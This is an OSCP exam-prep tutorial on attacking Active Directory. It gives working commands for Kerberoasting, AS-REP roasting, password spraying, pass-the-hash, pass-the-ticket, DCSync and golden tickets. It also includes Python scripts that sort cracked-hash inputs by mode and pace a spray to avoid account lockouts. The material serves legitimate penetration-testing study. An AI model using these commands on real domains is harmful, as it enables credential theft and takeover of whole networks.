Active Directory & Exam Simulation
Active Directory Attacks
AD attacks are critical for OSCP. The AD set can be worth up to 40 points. Master these techniques to maximize your exam score.
Kerberoasting
Kerberoasting requests service tickets (TGS) for accounts that have an SPN. Any authenticated domain user can do this; the ticket is encrypted with a key derived from the service account's password, so it can be cracked offline without touching the DC again.
How It Works
Kerberoasting Flow:
1. Authenticated user requests a TGS for a service (identified by its SPN)
2. DC returns the TGS encrypted with the service account's key (the NT hash for RC4, etype 23)
3. Attacker extracts the ticket and cracks it offline against a wordlist
4. If it cracks, authenticate as the service account (often privileged)
Prefer user accounts with SPNs over machine accounts: machine account passwords are long and random and will not crack.
Using Impacket (Linux)
# Request TGS for all SPNs
GetUserSPNs.py corp.local/user:password -dc-ip $DC -request
# Output to file
GetUserSPNs.py corp.local/user:password -dc-ip $DC -request -outputfile hashes.txt
# Crack with hashcat (mode 13100 = RC4/etype 23; AES tickets need 19600 or 19700)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Using Rubeus (Windows)
# Kerberoast all users
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
Using PowerView
# Request TGS tickets (-ExpandProperty gives bare strings; -Encoding ascii avoids the UTF-16 default that hashcat cannot read)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -Encoding ascii hashes.txt
AS-REP Roasting
Targets accounts with "Do not require Kerberos preauthentication" enabled: the DC answers an AS-REQ for such a user with data encrypted under the user's key, so only a username list is needed, no credentials.
Finding Vulnerable Accounts
# From Linux - check without creds
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip $DC -format hashcat
# With creds - find all vulnerable
GetNPUsers.py corp.local/user:password -dc-ip $DC -request
From Windows
# Using Rubeus (default output is john format; ask for hashcat explicitly)
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
# Using PowerView
Get-DomainUser -PreauthNotRequired
Cracking AS-REP Hashes
# Hashcat mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
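Both roasting attacks above end with a text file of `$krb5tgs$...` / `$krb5asrep$...` lines, and the most common reason a crack "finds nothing" is feeding AES tickets to mode 13100. The following Python script is an added example (not code from the page or from the impacket/Rubeus projects) that parses the hash layouts written by GetUserSPNs.py, GetNPUsers.py and Rubeus, validates the checksum length per encryption type, and buckets the lines by the hashcat mode that will actually crack them. The sample lines are constructed, with the hex data shortened.

```python
import re
from collections import defaultdict

# hashcat mode per (ticket kind, Kerberos etype); picking the wrong one silently cracks nothing
HASHCAT_MODES = {
    ("tgs", 23): 13100,    # Kerberoast, RC4-HMAC
    ("tgs", 17): 19600,    # Kerberoast, AES128-CTS-HMAC-SHA1-96
    ("tgs", 18): 19700,    # Kerberoast, AES256-CTS-HMAC-SHA1-96
    ("asrep", 23): 18200,  # AS-REP roast, RC4-HMAC
    ("asrep", 17): 32100,  # AS-REP roast, AES128
    ("asrep", 18): 32200,  # AS-REP roast, AES256
}

HEX = re.compile(r"^[0-9a-fA-F]+$")
# $krb5asrep$23$user@REALM:checksum$data   (GetNPUsers.py -format hashcat / Rubeus /format:hashcat)
ASREP_RC4 = re.compile(r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:$]+):([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")
# $krb5asrep$17$user$REALM$checksum$data   (layout of hashcat's 32100/32200 example hashes)
ASREP_AES = re.compile(r"^\$krb5asrep\$(1[78])\$([^$]+)\$([^$]+)\$([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")


def parse_tgs(line):
    """Kerberoast line: $krb5tgs$23$*user$REALM$spn*$checksum$data (RC4) or
    $krb5tgs$17$user$REALM$*spn*$checksum$data (AES). The last two '$' fields are
    always hex, so everything between realm and checksum is the (optional) SPN.
    Account names containing '$' (machine accounts) are not handled."""
    parts = line.split("$")
    if len(parts) < 7 or parts[0] != "" or parts[1] != "krb5tgs" or not parts[2].isdigit():
        return None
    checksum, data = parts[-2], parts[-1]
    if not (HEX.match(checksum) and HEX.match(data)):
        return None
    return {"kind": "tgs", "etype": int(parts[2]), "user": parts[3].lstrip("*"),
            "realm": parts[4], "spn": "$".join(parts[5:-2]).strip("*") or None,
            "checksum": checksum}


def parse_asrep(line):
    m = ASREP_RC4.match(line) or ASREP_AES.match(line)
    if not m:
        return None
    etype, user, realm, checksum, _data = m.groups()
    return {"kind": "asrep", "etype": int(etype), "user": user, "realm": realm,
            "spn": None, "checksum": checksum}


def parse_hash_line(line):
    """Parsed fields plus the hashcat mode, or None if the line is not a Kerberos hash."""
    line = line.strip()
    rec = parse_tgs(line) or parse_asrep(line)
    if rec is None:
        return None
    # RC4 carries a 16-byte HMAC-MD5 checksum, AES a 12-byte HMAC-SHA1-96 one
    if len(rec["checksum"]) != (32 if rec["etype"] == 23 else 24):
        return None
    rec["mode"] = HASHCAT_MODES.get((rec["kind"], rec["etype"]))
    return rec


def split_by_mode(lines):
    """Group hash lines by the hashcat mode that cracks them."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_hash_line(line)
        if rec and rec["mode"]:
            buckets[rec["mode"]].append(line.strip())
    return dict(buckets)


# constructed sample lines (hex shortened; real ones are several hundred bytes)
SAMPLE_LINES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + "12" * 12 + "$" + "ef" * 40,
    "$krb5asrep$23$jdoe@CORP.LOCAL:" + "34" * 16 + "$" + "56" * 40,
    "not a kerberos hash",
]

if __name__ == "__main__":
    for mode, hashes in split_by_mode(SAMPLE_LINES).items():
        fname = f"hashes_{mode}.txt"
        with open(fname, "w") as fh:
            fh.write("\n".join(hashes) + "\n")
        print(f"hashcat -m {mode} {fname} /usr/share/wordlists/rockyou.txt")
```

Run it over the real output file (`split_by_mode(open("hashes.txt").readlines())`) and you get one file and one hashcat command per mode; an AES-only result usually means the service account has RC4 disabled, in which case GetUserSPNs.py output still cracks, just under 19600/19700.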
Password Spraying
Test one password against many accounts per round, staying below the lockout threshold, instead of many passwords against one account.
Using CrackMapExec
# Spray single password
crackmapexec smb $DC -u users.txt -p 'Password123' --continue-on-success
# Check for valid accounts
crackmapexec smb $DC -u users.txt -p 'Summer2024!' --continue-on-success
Using Kerbrute
# Password spray via Kerberos pre-auth (fewer SMB logon events, but failures still count toward lockout)
kerbrute passwordspray -d corp.local --dc $DC users.txt 'Password123'
Spray Strategy
Tips for Password Spraying:
├── Check the password policy first (lockoutThreshold, lockoutObservationWindow, lockoutDuration)
├── Stay at least one attempt below the threshold per round, then wait a full observation window (the counter resets only that long after the last failure)
├── Try seasonal passwords (Summer2024, Winter2024!)
├── Try company name variations
└── Try keyboard patterns (Qwerty123!)
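The tips above boil down to a scheduling rule, and the part people get wrong is that AD's bad-password counter resets relative to the last failure, not the first. The Python below is an added example (not from the page or any spray tool) that models that lockout logic in a constructed fake DC, runs a spray that keeps every account `margin` attempts under the threshold and waits out the observation window after each batch, and shows what happens when the margin is dropped. The `auth` callback is where a real run would call CrackMapExec or kerbrute; the users, passwords and policy values are constructed.

```python
from collections import defaultdict


class FakeClock:
    """Constructed clock so the demo runs instantly; sleep() just advances time."""
    def __init__(self):
        self.t = 0.0

    def now(self):
        return self.t

    def sleep(self, seconds):
        self.t += seconds


class FakeDC:
    """Constructed model of AD lockout: badPwdCount goes up on each failure and is
    reset only when the *last* failure is older than lockoutObservationWindow, or on a
    successful logon. Reaching the threshold locks the account (auto-unlock ignored)."""
    def __init__(self, creds, threshold, window, clock):
        self.creds, self.threshold, self.window, self.clock = creds, threshold, window, clock
        self.bad_count = defaultdict(int)
        self.last_bad = {}
        self.locked = set()

    def auth(self, user, password):
        now = self.clock.now()
        if user in self.locked:
            return False
        if user in self.last_bad and now - self.last_bad[user] >= self.window:
            self.bad_count[user] = 0
        if self.creds.get(user) == password:
            self.bad_count[user] = 0
            return True
        self.bad_count[user] += 1
        self.last_bad[user] = now
        if self.bad_count[user] >= self.threshold:
            self.locked.add(user)
        return False


def spray(users, passwords, auth, threshold, window, clock, margin=1):
    """One password against every user per round. After (threshold - margin) rounds,
    wait until a full observation window has passed since the last attempt so every
    account's badPwdCount has reset. auth(user, pw) -> bool is the login attempt."""
    per_window = threshold - margin
    if per_window < 1:
        raise ValueError("lockout threshold too low to spray safely")
    found, remaining = {}, list(users)
    last_attempt = None
    for i, pw in enumerate(passwords):
        if i and i % per_window == 0 and last_attempt is not None:
            wait = last_attempt + window - clock.now()
            if wait > 0:
                clock.sleep(wait)
        for user in remaining:
            if auth(user, pw):
                found[user] = pw
        remaining = [u for u in remaining if u not in found]
        last_attempt = clock.now()
    return found


def seasonal_candidates(year, company):
    """Candidate list in the spirit of the tips above: seasons, company name,
    keyboard patterns, each with and without a trailing '!'."""
    seasons = ["Spring", "Summer", "Autumn", "Fall", "Winter"]
    base = [f"{s}{year}" for s in seasons] + [f"{s}{str(year)[-2:]}" for s in seasons]
    base += [f"{company}{year}", f"{company}123", "Qwerty123", "Password123"]
    return sorted(set(base + [b + "!" for b in base]))


def run_demo(margin=1):
    """Spray a constructed user set; returns (found creds, locked accounts, seconds elapsed)."""
    clock = FakeClock()
    # constructed target: two guessable passwords, policy of 5 attempts per 30 minutes
    dc = FakeDC({"bob": "Summer2024!", "dave": "Winter2024!"}, threshold=5, window=1800, clock=clock)
    users = ["alice", "bob", "carol", "dave"]
    passwords = ["Password123", "Summer2024", "Summer2024!", "Qwerty123!", "Winter2024!"]
    found = spray(users, passwords, dc.auth, threshold=5, window=1800, clock=clock, margin=margin)
    return found, dc.locked, clock.now()


if __name__ == "__main__":
    print(run_demo(margin=1))  # no lockouts, one 30-minute pause before the fifth password
    print(run_demo(margin=0))  # alice and carol hit 5 failures and lock
```

Read the real values from the DC before choosing `threshold` and `window` (CrackMapExec's `--pass-pol` prints them); a threshold of 0 means no lockout, and a margin of one leaves room for the user's own typos.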
Pass-the-Hash (PtH)
Authenticate with the NT hash itself: NTLM authentication only proves possession of the hash, so a dumped hash is a password equivalent and never needs cracking. This works for domain accounts and the built-in RID-500 local Administrator; other local admin accounts are blocked over the network by UAC remote restrictions by default.
Using Impacket
# WMI execution
wmiexec.py -hashes :NTHASH corp.local/administrator@$TARGET
# PSExec
psexec.py -hashes :NTHASH corp.local/administrator@$TARGET
# SMBExec
smbexec.py -hashes :NTHASH corp.local/administrator@$TARGET
Using CrackMapExec
# Execute command with hash
crackmapexec smb $TARGET -u administrator -H NTHASH -x "whoami"
# Check admin access across the network ((Pwn3d!) marks hosts where the account is local admin)
crackmapexec smb $NETWORK/24 -u administrator -H NTHASH
Using Evil-WinRM
# Connect with hash
evil-winrm -i $TARGET -u administrator -H NTHASH
Pass-the-Ticket (PtT)
Use stolen Kerberos tickets for authentication.
Export Tickets (Windows)
# Using Rubeus (elevated; lists and base64-dumps tickets from every logon session)
.\Rubeus.exe dump /nowrap
# Using Mimikatz (needs privilege::debug; writes .kirbi files to the current directory)
mimikatz# sekurlsa::tickets /export
Import and Use Tickets
# Rubeus pass-the-ticket
.\Rubeus.exe ptt /ticket:BASE64_TICKET
# Mimikatz
mimikatz# kerberos::ptt ticket.kirbi
# Verify
klist
From Linux
# Convert ticket format
ticketConverter.py ticket.kirbi ticket.ccache
# Use with Impacket ($TARGET must be the host's FQDN, not an IP: Kerberos needs a matching SPN)
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass corp.local/user@$TARGET
DCSync Attack
Extract password hashes directly from a Domain Controller by asking it to replicate, the way another DC would (DRSUAPI). Requires Domain Admin, or any account holding the "Replicating Directory Changes" and "Replicating Directory Changes All" rights on the domain object.
Using Mimikatz
# Dump all hashes
mimikatz# lsadump::dcsync /domain:corp.local /all /csv
# Dump specific user
mimikatz# lsadump::dcsync /domain:corp.local /user:administrator
Using Impacket
# Secretsdump with DA creds
secretsdump.py corp.local/administrator:password@$DC
# With hash
secretsdump.py -hashes :NTHASH corp.local/administrator@$DC
Golden Ticket Attack
Forge a TGT with the krbtgt account's key. The DC trusts anything encrypted with that key, so the ticket grants domain access as any user and stays valid until the krbtgt password has been rotated twice.
Requirements
Golden Ticket Requirements:
├── krbtgt NTLM hash (from DCSync)
├── Domain SID
├── Domain name
└── User to impersonate (typically Administrator)
Creating Golden Ticket
# Mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
# From Linux with ticketer.py
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
# Use the ticket (ticketer.py writes Administrator.ccache; $DC must be the DC's FQDN, not an IP)
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@$DC
AD Attack Cheat Sheet
| Attack | When to Use | Tool |
|---|---|---|
| Kerberoasting | Have domain user | GetUserSPNs.py |
| AS-REP Roast | Users without preauth | GetNPUsers.py |
| Password Spray | Valid usernames | CrackMapExec |
| Pass-the-Hash | Have NTLM hash | wmiexec.py |
| DCSync | Have DA or replication rights | secretsdump.py |
| Golden Ticket | Have krbtgt hash | ticketer.py |
OSCP AD Attack Flow
AD Attack Methodology:
1. Enumerate users, groups, SPNs, preauth settings
└── BloodHound, PowerView, ldapsearch
2. Kerberoast/AS-REP Roast
└── Crack hashes offline, get creds
3. Password spray if needed
└── CrackMapExec, kerbrute (check the lockout policy first)
4. Lateral movement with creds/hashes
└── PtH, PtT, evil-winrm
5. Escalate to Domain Admin
└── Reuse cracked or passed creds that hold admin rights (BloodHound paths)
6. Compromise the Domain Controller
└── DCSync to dump krbtgt and all hashes; golden ticket for persistence if needed
Next, we'll cover lateral movement techniques for moving through the AD environment.